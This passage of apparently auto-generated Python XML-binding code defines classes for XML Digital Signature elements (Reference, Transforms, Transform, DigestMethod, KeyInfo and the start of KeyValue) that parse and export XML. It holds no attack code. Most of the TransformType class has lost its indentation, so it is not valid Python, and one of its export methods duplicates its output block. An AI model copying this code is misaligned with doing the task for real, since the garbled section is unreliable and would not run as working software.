            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='ReferenceType'):
        if self.Type is not None and 'Type' not in already_processed:
            already_processed.add('Type')
            outfile.write(' Type=%s' % (self.gds_format_string(quote_attrib(self.Type).encode(ExternalEncoding), input_name='Type'), ))
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
        if self.URI is not None and 'URI' not in already_processed:
            already_processed.add('URI')
            outfile.write(' URI=%s' % (self.gds_format_string(quote_attrib(self.URI).encode(ExternalEncoding), input_name='URI'), ))
    def exportChildren(self, outfile, level, namespace_='ds:', name_='ReferenceType', fromsubclass_=False, pretty_print=True):
        """Write children in schema order: Transforms, DigestMethod,
        then DigestValue (re-encoded as base64 text)."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.Transforms is not None:
            self.Transforms.export(outfile, level, namespace_, name_='Transforms', pretty_print=pretty_print)
        if self.DigestMethod is not None:
            self.DigestMethod.export(outfile, level, namespace_, name_='DigestMethod', pretty_print=pretty_print)
        if self.DigestValue is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sDigestValue>%s</%sDigestValue>%s' % (namespace_, self.gds_format_base64(self.DigestValue, input_name='DigestValue'), namespace_, eol_))
    def exportLiteral(self, outfile, level, name_='ReferenceType'):
        """Write this object as a Python-literal constructor expression."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        if self.Type is not None and 'Type' not in already_processed:
            already_processed.add('Type')
            showIndent(outfile, level)
            outfile.write('Type="%s",\n' % (self.Type,))
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            showIndent(outfile, level)
            outfile.write('Id="%s",\n' % (self.Id,))
        if self.URI is not None and 'URI' not in already_processed:
            already_processed.add('URI')
            showIndent(outfile, level)
            outfile.write('URI="%s",\n' % (self.URI,))
    def exportLiteralChildren(self, outfile, level, name_):
        if self.Transforms is not None:
            showIndent(outfile, level)
            outfile.write('Transforms=model_.Transforms(\n')
            self.Transforms.exportLiteral(outfile, level)
            showIndent(outfile, level)
            outfile.write('),\n')
        if self.DigestMethod is not None:
            showIndent(outfile, level)
            outfile.write('DigestMethod=model_.DigestMethod(\n')
            self.DigestMethod.exportLiteral(outfile, level)
            showIndent(outfile, level)
            outfile.write('),\n')
        if self.DigestValue is not None:
            showIndent(outfile, level)
            outfile.write('DigestValue=model_.base64Binary(\n')
            self.DigestValue.exportLiteral(outfile, level, name_='DigestValue')
            showIndent(outfile, level)
            outfile.write('),\n')
    def build(self, node):
        """Populate this object from an ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('Type', node)
        if value is not None and 'Type' not in already_processed:
            already_processed.add('Type')
            self.Type = value
        value = find_attr_value_('Id', node)
        if value is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            self.Id = value
        value = find_attr_value_('URI', node)
        if value is not None and 'URI' not in already_processed:
            already_processed.add('URI')
            self.URI = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'Transforms':
            obj_ = TransformsType.factory()
            obj_.build(child_)
            self.Transforms = obj_
        elif nodeName_ == 'DigestMethod':
            obj_ = DigestMethodType.factory()
            obj_.build(child_)
            self.DigestMethod = obj_
        elif nodeName_ == 'DigestValue':
            sval_ = child_.text
            if sval_ is not None:
                try:
                    # Decode here so DigestValue holds raw bytes in memory.
                    bval_ = base64.b64decode(sval_)
                except (TypeError, ValueError) as exp:
                    raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
                bval_ = self.gds_validate_base64(bval_, node, 'DigestValue')
            else:
                bval_ = None
            self.DigestValue = bval_
# end class ReferenceType
class TransformsType(GeneratedsSuper):
    """Generated binding for ds:Transforms: an ordered list of Transform
    children and no attributes."""
    # Hook for a hand-written subclass; factory() instantiates it when set.
    subclass = None
    superclass = None
    def __init__(self, Transform=None):
        # Fresh list per instance unless the caller supplies one.
        self.Transform = [] if Transform is None else Transform
    def factory(*args_, **kwargs_):
        target_cls = TransformsType.subclass or TransformsType
        return target_cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_Transform(self): return self.Transform
    def set_Transform(self, Transform): self.Transform = Transform
    def add_Transform(self, value): self.Transform.append(value)
    def insert_Transform(self, index, value): self.Transform[index] = value
    def hasContent_(self):
        # The Transform list is the only possible content.
        return bool(self.Transform)
    def export(self, outfile, level, namespace_='ds:', name_='TransformsType', namespacedef_='', pretty_print=True):
        """Write this object to *outfile* as an XML element."""
        eol_ = '\n' if pretty_print else ''
        showIndent(outfile, level, pretty_print)
        ns_extra = ' ' + namespacedef_ if namespacedef_ else ''
        outfile.write('<%s%s%s' % (namespace_, name_, ns_extra))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='TransformsType')
        if not self.hasContent_():
            # Empty element: self-closing form.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='TransformsType'):
        # No attributes in the schema for this type.
        pass
    def exportChildren(self, outfile, level, namespace_='ds:', name_='TransformsType', fromsubclass_=False, pretty_print=True):
        for transform_obj in self.Transform:
            transform_obj.export(outfile, level, namespace_, name_='Transform', pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='TransformsType'):
        """Write this object as a Python-literal constructor expression."""
        level += 1
        self.exportLiteralAttributes(outfile, level, set(), name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass
    def exportLiteralChildren(self, outfile, level, name_):
        showIndent(outfile, level)
        outfile.write('Transform=[\n')
        inner_level = level + 1
        for transform_obj in self.Transform:
            showIndent(outfile, inner_level)
            outfile.write('model_.Transform(\n')
            transform_obj.exportLiteral(outfile, inner_level)
            showIndent(outfile, inner_level)
            outfile.write('),\n')
        showIndent(outfile, level)
        outfile.write('],\n')
    def build(self, node):
        """Populate this object from an ElementTree *node*."""
        self.buildAttributes(node, node.attrib, set())
        for child in node:
            tag_name = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, tag_name)
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'Transform':
            obj_ = TransformType.factory()
            obj_.build(child_)
            self.Transform.append(obj_)
# end class TransformsType
class TransformType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Algorithm=None, anytypeobjs_=None, XPath=None, valueOf_=None, mixedclass_=None, content_=None):
self.Algorithm = _cast(None, Algorithm)
self.anytypeobjs_ = anytypeobjs_
if XPath is None:
self.XPath = []
else:
self.XPath = XPath
self.valueOf_ = valueOf_
if mixedclass_ is None:
self.mixedclass_ = MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if TransformType.subclass:
return TransformType.subclass(*args_, **kwargs_)
else:
return TransformType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def get_XPath(self): return self.XPath
def set_XPath(self, XPath): self.XPath = XPath
def add_XPath(self, value): self.XPath.append(value)
def insert_XPath(self, index, value): self.XPath[index] = value
def get_Algorithm(self): return self.Algorithm
def set_Algorithm(self, Algorithm): self.Algorithm = Algorithm
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.anytypeobjs_ is not None or
self.XPath or
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='TransformType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='TransformType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='TransformType'):
if self.Algorithm is not None and 'Algorithm' not in already_processed:
already_processed.add('Algorithm')
outfile.write(' Algorithm=%s' % (self.gds_format_string(quote_attrib(self.Algorithm).encode(ExternalEncoding), input_name='Algorithm'), ))
    def exportChildren(self, outfile, level, namespace_='ds:', name_='TransformType', fromsubclass_=False, pretty_print=True):
        """Write child elements and interleaved text in document order."""
        if not fromsubclass_:
            # content_ preserves the original mixed-content ordering.
            for item_ in self.content_:
                item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='TransformType'):
        """Write this instance as a Python constructor-literal snippet."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        """Write the Algorithm attribute as a keyword argument literal."""
        if self.Algorithm is not None and 'Algorithm' not in already_processed:
            already_processed.add('Algorithm')
            showIndent(outfile, level)
            outfile.write('Algorithm="%s",\n' % (self.Algorithm,))
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
showIndent(outfile, level)
outfile.write('content_ = [\n')
for item_ in self.content_:
item_.exportLiteral(outfile, level, name_)
showIndent(outfile, level)
outfile.write('],\n')
pass
    def build(self, node):
        """Populate this instance from an ElementTree/lxml element node."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        if node.text is not None:
            # Leading character data becomes the first mixed-content item.
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', node.text)
            self.content_.append(obj_)
        for child in node:
            # Strip any namespace prefix from the tag before dispatching.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        """Read the Algorithm attribute from the XML node, if present."""
        value = find_attr_value_('Algorithm', node)
        if value is not None and 'Algorithm' not in already_processed:
            already_processed.add('Algorithm')
            self.Algorithm = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Convert one child element into mixed-content entries.

        An empty nodeName_ denotes a wildcard (xs:any) child; 'XPath'
        children are stored as simple strings.  Tail text after the child
        is appended as a separate text item to preserve document order.
        """
        if nodeName_ == '':
            # NOTE(review): __ANY__ looks like a generator placeholder for
            # the wildcard element class -- confirm it is defined at module
            # level, otherwise this branch raises NameError at runtime.
            obj_ = __ANY__.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, '', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_'):
                self.add_(obj_.value)
            elif hasattr(self, 'set_'):
                self.set_(obj_.value)
        elif nodeName_ == 'XPath' and child_.text is not None:
            valuestr_ = child_.text
            obj_ = self.mixedclass_(MixedContainer.CategorySimple,
                MixedContainer.TypeString, 'XPath', valuestr_)
            self.content_.append(obj_)
        if not fromsubclass_ and child_.tail is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', child_.tail)
            self.content_.append(obj_)
# end class TransformType
class DigestMethodType(GeneratedsSuper):
    """Generated binding for the XML-DSig ``DigestMethodType`` complex type.

    Mixed-content type: text and wildcard children are kept in document
    order in ``content_`` (a list of MixedContainer items).  ``Algorithm``
    is the digest-algorithm URI attribute.
    """
    subclass = None
    superclass = None
    def __init__(self, Algorithm=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
        self.Algorithm = _cast(None, Algorithm)
        if anytypeobjs_ is None:
            self.anytypeobjs_ = []
        else:
            self.anytypeobjs_ = anytypeobjs_
        self.valueOf_ = valueOf_
        if mixedclass_ is None:
            self.mixedclass_ = MixedContainer
        else:
            self.mixedclass_ = mixedclass_
        if content_ is None:
            self.content_ = []
        else:
            self.content_ = content_
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        if DigestMethodType.subclass:
            return DigestMethodType.subclass(*args_, **kwargs_)
        else:
            return DigestMethodType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessor boilerplate.
    def get_anytypeobjs_(self): return self.anytypeobjs_
    def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
    def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
    # Fixed: previously assigned through self._anytypeobjs_, an attribute
    # that is never created, so calling this always raised AttributeError.
    def insert_anytypeobjs_(self, index, value): self.anytypeobjs_[index] = value
    def get_Algorithm(self): return self.Algorithm
    def set_Algorithm(self, Algorithm): self.Algorithm = Algorithm
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        """Return True when there is any content to serialize."""
        if (
            self.anytypeobjs_ or
            self.valueOf_
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='ds:', name_='DigestMethodType', namespacedef_='', pretty_print=True):
        """Serialize this element (attributes plus mixed content) as XML."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='DigestMethodType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            # No content: collapse to a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='DigestMethodType'):
        """Write the Algorithm XML attribute, recording it in already_processed."""
        if self.Algorithm is not None and 'Algorithm' not in already_processed:
            already_processed.add('Algorithm')
            outfile.write(' Algorithm=%s' % (self.gds_format_string(quote_attrib(self.Algorithm).encode(ExternalEncoding), input_name='Algorithm'), ))
    def exportChildren(self, outfile, level, namespace_='ds:', name_='DigestMethodType', fromsubclass_=False, pretty_print=True):
        """Write child elements and interleaved text in document order."""
        if not fromsubclass_:
            for item_ in self.content_:
                item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='DigestMethodType'):
        """Write this instance as a Python constructor-literal snippet."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        """Write the Algorithm attribute as a keyword argument literal."""
        if self.Algorithm is not None and 'Algorithm' not in already_processed:
            already_processed.add('Algorithm')
            showIndent(outfile, level)
            outfile.write('Algorithm="%s",\n' % (self.Algorithm,))
    def exportLiteralChildren(self, outfile, level, name_):
        """Write the mixed-content list as a Python literal."""
        showIndent(outfile, level)
        outfile.write('content_ = [\n')
        for item_ in self.content_:
            item_.exportLiteral(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('],\n')
    def build(self, node):
        """Populate this instance from an ElementTree/lxml element node."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        if node.text is not None:
            # Leading character data becomes the first mixed-content item.
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', node.text)
            self.content_.append(obj_)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        """Read the Algorithm attribute from the XML node, if present."""
        value = find_attr_value_('Algorithm', node)
        if value is not None and 'Algorithm' not in already_processed:
            already_processed.add('Algorithm')
            self.Algorithm = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Convert one child element into mixed-content entries.

        An empty nodeName_ denotes a wildcard (xs:any) child; tail text
        after the child is appended as a separate text item.
        """
        if nodeName_ == '':
            # NOTE(review): __ANY__ looks like a generator placeholder --
            # confirm it is defined at module level.
            obj_ = __ANY__.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, '', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_'):
                self.add_(obj_.value)
            elif hasattr(self, 'set_'):
                self.set_(obj_.value)
        if not fromsubclass_ and child_.tail is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', child_.tail)
            self.content_.append(obj_)
class KeyInfoType(GeneratedsSuper):
    """Generated binding for the XML-DSig ``KeyInfoType`` complex type.

    Mixed-content type: all child elements and interleaved text are kept
    in document order in ``content_``; the typed lists (KeyName, KeyValue,
    RetrievalMethod, X509Data, PGPData, SPKIData, MgmtData) mirror them.
    ``Id`` is the optional XML attribute.
    """
    subclass = None
    superclass = None
    def __init__(self, Id=None, KeyName=None, KeyValue=None, RetrievalMethod=None, X509Data=None, PGPData=None, SPKIData=None, MgmtData=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
        self.Id = _cast(None, Id)
        if KeyName is None:
            self.KeyName = []
        else:
            self.KeyName = KeyName
        if KeyValue is None:
            self.KeyValue = []
        else:
            self.KeyValue = KeyValue
        if RetrievalMethod is None:
            self.RetrievalMethod = []
        else:
            self.RetrievalMethod = RetrievalMethod
        if X509Data is None:
            self.X509Data = []
        else:
            self.X509Data = X509Data
        if PGPData is None:
            self.PGPData = []
        else:
            self.PGPData = PGPData
        if SPKIData is None:
            self.SPKIData = []
        else:
            self.SPKIData = SPKIData
        if MgmtData is None:
            self.MgmtData = []
        else:
            self.MgmtData = MgmtData
        self.anytypeobjs_ = anytypeobjs_
        self.valueOf_ = valueOf_
        if mixedclass_ is None:
            self.mixedclass_ = MixedContainer
        else:
            self.mixedclass_ = mixedclass_
        if content_ is None:
            self.content_ = []
        else:
            self.content_ = content_
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        if KeyInfoType.subclass:
            return KeyInfoType.subclass(*args_, **kwargs_)
        else:
            return KeyInfoType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessor boilerplate: getters/setters plus list helpers for
    # each repeating child element.
    def get_KeyName(self): return self.KeyName
    def set_KeyName(self, KeyName): self.KeyName = KeyName
    def add_KeyName(self, value): self.KeyName.append(value)
    def insert_KeyName(self, index, value): self.KeyName[index] = value
    def get_KeyValue(self): return self.KeyValue
    def set_KeyValue(self, KeyValue): self.KeyValue = KeyValue
    def add_KeyValue(self, value): self.KeyValue.append(value)
    def insert_KeyValue(self, index, value): self.KeyValue[index] = value
    def get_RetrievalMethod(self): return self.RetrievalMethod
    def set_RetrievalMethod(self, RetrievalMethod): self.RetrievalMethod = RetrievalMethod
    def add_RetrievalMethod(self, value): self.RetrievalMethod.append(value)
    def insert_RetrievalMethod(self, index, value): self.RetrievalMethod[index] = value
    def get_X509Data(self): return self.X509Data
    def set_X509Data(self, X509Data): self.X509Data = X509Data
    def add_X509Data(self, value): self.X509Data.append(value)
    def insert_X509Data(self, index, value): self.X509Data[index] = value
    def get_PGPData(self): return self.PGPData
    def set_PGPData(self, PGPData): self.PGPData = PGPData
    def add_PGPData(self, value): self.PGPData.append(value)
    def insert_PGPData(self, index, value): self.PGPData[index] = value
    def get_SPKIData(self): return self.SPKIData
    def set_SPKIData(self, SPKIData): self.SPKIData = SPKIData
    def add_SPKIData(self, value): self.SPKIData.append(value)
    def insert_SPKIData(self, index, value): self.SPKIData[index] = value
    def get_MgmtData(self): return self.MgmtData
    def set_MgmtData(self, MgmtData): self.MgmtData = MgmtData
    def add_MgmtData(self, value): self.MgmtData.append(value)
    def insert_MgmtData(self, index, value): self.MgmtData[index] = value
    def get_anytypeobjs_(self): return self.anytypeobjs_
    def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
    def get_Id(self): return self.Id
    def set_Id(self, Id): self.Id = Id
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        """Return True when there is any content to serialize."""
        if (
            self.KeyName or
            self.KeyValue or
            self.RetrievalMethod or
            self.X509Data or
            self.PGPData or
            self.SPKIData or
            self.MgmtData or
            self.anytypeobjs_ is not None or
            self.valueOf_
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='ds:', name_='KeyInfoType', namespacedef_='', pretty_print=True):
        """Serialize this element (attributes plus mixed content) as XML."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='KeyInfoType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            # No content: collapse to a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='KeyInfoType'):
        """Write the Id XML attribute, recording it in already_processed."""
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
    def exportChildren(self, outfile, level, namespace_='ds:', name_='KeyInfoType', fromsubclass_=False, pretty_print=True):
        """Write child elements and interleaved text in document order."""
        if not fromsubclass_:
            for item_ in self.content_:
                item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='KeyInfoType'):
        """Write this instance as a Python constructor-literal snippet."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        """Write the Id attribute as a keyword argument literal."""
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            showIndent(outfile, level)
            outfile.write('Id="%s",\n' % (self.Id,))
    def exportLiteralChildren(self, outfile, level, name_):
        """Write the mixed-content list as a Python literal.

        Fixed: the generated code repeated the ``content_ = [...]`` block
        once per child element (eight times), producing duplicate
        ``content_`` keywords in the emitted literal; a single pass over
        ``content_`` is sufficient.
        """
        showIndent(outfile, level)
        outfile.write('content_ = [\n')
        for item_ in self.content_:
            item_.exportLiteral(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('],\n')
    def build(self, node):
        """Populate this instance from an ElementTree/lxml element node."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        if node.text is not None:
            # Leading character data becomes the first mixed-content item.
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', node.text)
            self.content_.append(obj_)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        """Read the Id attribute from the XML node, if present."""
        value = find_attr_value_('Id', node)
        if value is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            self.Id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Convert one child element into mixed-content entries.

        Simple string children (KeyName, MgmtData) are stored as strings;
        complex children are built through their generated classes.  An
        empty nodeName_ denotes a wildcard (xs:any) child.  Tail text
        after the child preserves document order as a text item.
        """
        if nodeName_ == 'KeyName' and child_.text is not None:
            valuestr_ = child_.text
            obj_ = self.mixedclass_(MixedContainer.CategorySimple,
                MixedContainer.TypeString, 'KeyName', valuestr_)
            self.content_.append(obj_)
        elif nodeName_ == 'KeyValue':
            obj_ = KeyValue.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, 'KeyValue', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_KeyValue'):
                self.add_KeyValue(obj_.value)
            elif hasattr(self, 'set_KeyValue'):
                self.set_KeyValue(obj_.value)
        elif nodeName_ == 'RetrievalMethod':
            obj_ = RetrievalMethod.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, 'RetrievalMethod', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_RetrievalMethod'):
                self.add_RetrievalMethod(obj_.value)
            elif hasattr(self, 'set_RetrievalMethod'):
                self.set_RetrievalMethod(obj_.value)
        elif nodeName_ == 'X509Data':
            obj_ = X509Data.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, 'X509Data', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_X509Data'):
                self.add_X509Data(obj_.value)
            elif hasattr(self, 'set_X509Data'):
                self.set_X509Data(obj_.value)
        elif nodeName_ == 'PGPData':
            obj_ = PGPData.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, 'PGPData', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_PGPData'):
                self.add_PGPData(obj_.value)
            elif hasattr(self, 'set_PGPData'):
                self.set_PGPData(obj_.value)
        elif nodeName_ == 'SPKIData':
            obj_ = SPKIData.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, 'SPKIData', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_SPKIData'):
                self.add_SPKIData(obj_.value)
            elif hasattr(self, 'set_SPKIData'):
                self.set_SPKIData(obj_.value)
        elif nodeName_ == 'MgmtData' and child_.text is not None:
            valuestr_ = child_.text
            obj_ = self.mixedclass_(MixedContainer.CategorySimple,
                MixedContainer.TypeString, 'MgmtData', valuestr_)
            self.content_.append(obj_)
        elif nodeName_ == '':
            # NOTE(review): __ANY__ looks like a generator placeholder --
            # confirm it is defined at module level.
            obj_ = __ANY__.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, '', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_'):
                self.add_(obj_.value)
            elif hasattr(self, 'set_'):
                self.set_(obj_.value)
        if not fromsubclass_ and child_.tail is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', child_.tail)
            self.content_.append(obj_)
class KeyValueType(GeneratedsSuper):
    """Generated binding for the XML-DSig ``KeyValueType`` complex type.

    Mixed-content type holding a single DSAKeyValue or RSAKeyValue child
    (or a wildcard child), preserved in document order in ``content_``.
    """
    subclass = None
    superclass = None
    def __init__(self, DSAKeyValue=None, RSAKeyValue=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
        self.DSAKeyValue = DSAKeyValue
        self.RSAKeyValue = RSAKeyValue
        self.anytypeobjs_ = anytypeobjs_
        self.valueOf_ = valueOf_
        if mixedclass_ is None:
            self.mixedclass_ = MixedContainer
        else:
            self.mixedclass_ = mixedclass_
        if content_ is None:
            self.content_ = []
        else:
            self.content_ = content_
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        if KeyValueType.subclass:
            return KeyValueType.subclass(*args_, **kwargs_)
        else:
            return KeyValueType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessor boilerplate.
    def get_DSAKeyValue(self): return self.DSAKeyValue
    def set_DSAKeyValue(self, DSAKeyValue): self.DSAKeyValue = DSAKeyValue
    def get_RSAKeyValue(self): return self.RSAKeyValue
    def set_RSAKeyValue(self, RSAKeyValue): self.RSAKeyValue = RSAKeyValue
    def get_anytypeobjs_(self): return self.anytypeobjs_
    def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        """Return True when there is any content to serialize."""
        if (
            self.DSAKeyValue is not None or
            self.RSAKeyValue is not None or
